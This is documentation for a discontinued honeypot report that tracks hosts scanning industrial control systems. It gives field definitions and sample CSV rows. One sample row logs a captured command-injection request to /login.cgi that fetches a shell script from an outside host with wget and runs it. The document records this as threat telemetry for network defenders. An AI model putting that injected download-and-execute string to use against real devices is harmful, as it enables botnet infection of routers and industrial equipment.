LEGACY: ICS Scanners Report

LAST UPDATED:  2021-06-07

LEGACY REPORT

Report discontinued. Replaced by: Honeypot ICS Scanner Events Report.

This report identifies hosts that have been observed performing scanning activity against Industrial Control System (ICS) sensors.

Scanning for ICS devices may be a benign activity — for example, having to do with a research project, or perfomed by an organization like the Shadowserver Foundation looking for open or vulnerable services that it can report to National CERTs and network owners so that they can remediate their networks.

Other scans, however, may be part of a network reconnaissance in the preparatory phase of an attack, or an attempt to exploit the devices being scanned.

Below is a description of a report based on data collected by SISSDEN ICS-aware honeypots. Basic information collected includes the source of the scan and the requests being sent, including the communication state and any other protocol specific details, if available. Note that because the ICS sensors used are also HTTP-aware, observed scans may also include non-ICS related attacks that happen to also hit these sensors. These may be considered false positives from an ICS-related attack perspective, but they may be attacks in themselves too.

This report type was created as part of the EU Horizon 2020 SISSDEN Project.

Please note this report will be replaced after 2021-06-01 by Honeypot ICS Scanner Events Report.

Fields

  • timestamp
    Time that the scan was performed in UTC+0
  • ip
    The IP address performing the scan
  • port
    The source port used in the scan
  • asn
    ASN announcing the scanning IP
  • geo
    Country where the scanning IP resides
  • region
    State / Province / Administrative region where the scanning IP resides
  • city
    ASN of where the scanning IP resides
  • hostname
    PTR record of the scanning IP
  • protocol
    Protocol used to query ICS device; e.g., http, modbus, s7comm
  • type
    Type of activity observed: i.e., ics-scan
  • dst_ip
    The IP address of the target device
  • dst_port
    Destination port used in the scan
  • dst_asn
    ASN announcing the target IP
  • dst_geo
    Country where the target IP resides
  • dst_dns
    FQDN of the target, if applicable and recorded
  • naics
    North American Industry Classification System Code of the scanning IP
  • sic
    Standard Industrial Classification System Code of the scanning IP
  • sector
    Standard Industrial Classification System Code of the scanning IP
  • dst_sector
    Sector to which the target IP belongs
  • public_source
    Source of the data, for cases where the source accepts being credited
  • sensorid
    ID of sensor target device
  • state
    Connection state (if applicable)
  • slave_id
    Modbus slave id being requested (if applicable)
  • function_code
    Modbus function code being used (if Modbus query)
  • request
    Request logged
  • response
    Response to query

Sample

"timestamp","ip","port","asn","geo","region","city","hostname","protocol","type","dst_ip","dst_port","dst_asn","dst_geo","dst_dns","naics","sic","sector","dst_sector","public_source","sensorid","state","slave_id","function_code","request","response"
"2018-09-16 00:00:54","198.51.100.5”,56066,3462,"TW","KEELUNG CITY","KEELUNG”,”5.dynamic-ip.example.net”,”http","ics-scan”,”203.0.113.10”,80,39324,"FI",,518210,737415,"Communications",,"SISSDEN","000a14be-2fd9-408f-a855-fd7f984f6bca",,,,"('/login.cgi?cli=aa%20aa%27;wget%20http://192.0.2.15/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$', ['Connection: keep-alive\r\n', 'Accept-Encoding: gzip, deflate\r\n', 'Accept: /\r\n', 'User-Agent: Hakai/2.0\r\n'], None)",404
"2018-09-16 06:16:38”,”198.51.100.20”,53757,10439,"US","CALIFORNIA","SAN DIEGO","ubuntu16193.example.com","modbus","ics-scan”,”203.0.113.77”,502,36352,"US",,0,0,"Communications","Commercial Facilities","SISSDEN","0015bab9-528b-4654-9909-45d5e53163c0","NEW_CONNECTION",,,,
"2018-09-16 11:46:46”,”198.51.200.30”,1128,57509,"CY","LEFKOSIA","NICOSIA",,"s7comm","ics-scan”,”203.0.113.99”,102,9009,"NO",,0,0,,,"SISSDEN","8b3d7782-2ccd-4ee9-a1f3-83f12014cf27","NEW_CONNECTION",,,,
"2018-09-16 23:51:13”,”198.51.200.50”,60565,26599,"BR","SAO PAULO","ITAPEVI",,"http","ics-scan","203.0.113.105”,80,15626,"UA",,0,0,,,"SISSDEN","c010c930-fdbc-458c-b82d-d872d3ef206d",,,,"('/', ['Host: 203.0.113.105:80\r\n', 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36\r\n', 'Content-Length: 0\r\n'], '')",302
"2018-09-16 23:29:47","198.51.200.75”,214,57043,"RU","KALUZHSKAYA OBLAST","OBNINSK",,"s7comm","ics-scan","203.0.113.199”,102,133398,"HK",,0,0,,"Communications","SISSDEN","0fdd59a3-a48d-4d6f-a9c4-a8ee3320575d","NEW_CONNECTION",,,,

Our 124 Report Types